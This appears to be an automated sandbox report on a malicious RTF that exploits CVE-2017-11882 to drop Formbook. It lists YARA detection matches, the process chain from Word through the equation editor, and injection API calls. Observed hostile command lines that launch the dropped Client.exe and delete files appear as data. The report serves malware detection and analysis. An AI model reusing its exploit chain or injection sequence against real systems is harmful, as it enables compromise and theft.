Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Client.exe PID: 316, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: notepad.exe PID: 2188, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 1800, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, score = , sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4F98E955-E40B-4BEE-AA1E-253D7E3CD6E7}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AF3F92 appears 132 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AF373B appears 245 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AAE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00B1F970 appears 84 times
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: String function: 00AADF5C appears 121 times
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00322548 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_00322540 NtQuerySystemInformation,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037F248 NtResumeThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037D898 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037CE80 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037D398 NtProtectVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0037DD98 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_004A0178 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0240B2E0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Code function: 6_2_0240B7B0 NtCreateThreadEx,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A410 NtReadFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A490 NtClose,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A35A NtCreateFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A40A NtReadFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A48F NtClose,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA07AC NtCreateMutant,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00AA1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\notepad.exe | Code function: 9_2_00A9FF34 NtQueueApcThread,
          Source: Client.exe.0.dr | Static PE information: Section: 5++.8$ ZLIB complexity 1.0003371646578538
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$curiteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf
          Source: classification engine | Classification label: mal100.troj.expl.evad.winRTF@11/9@2/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: explorer.exe, 0000000A.00000000.1030986946.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .VBPud<_
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | Virustotal: Detection: 43%
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | ReversingLabs: Detection: 21%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ................................C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.n.o.t.e.p.a.d...e.x.e...........................B.........0.......0.....
          Source: C:\Windows\SysWOW64\cmd.exe | Console Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P1P.......4.t...........0.......................&.................0.....
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C %tmp%\Client.exe A C
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\Client.exe C:\Users\user\AppData\Local\Temp\Client.exe A C
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Process created: C:\Windows\SysWOW64\notepad.exe C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
          Source: C:\Windows\SysWOW64\ipconfig.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\notepad.exe"
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR5B39.tmp
          Source: C:\Users\user\AppData\Local\Temp\Client.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.1905.rtf | Static file information: File size 2870044 > 1048576
          Source: Binary string: ipconfig.pdb source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ipconfig.pdbN source: notepad.exe, 00000009.00000003.1040858153.000000000081C000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000009.00000002.1043409063.0000000000030000.00000040.10000000.00040000.00000000.sdmp, notepad.exe, 00000009.00000002.1044510525.0000000000822000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: notepad.pdb source: ipconfig.exe, 0000000B.00000002.1177312343.000000000271F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 0000000B.00000002.1175813159.0000000000444000.00000004.00000020.00020000.00000000.sdmp
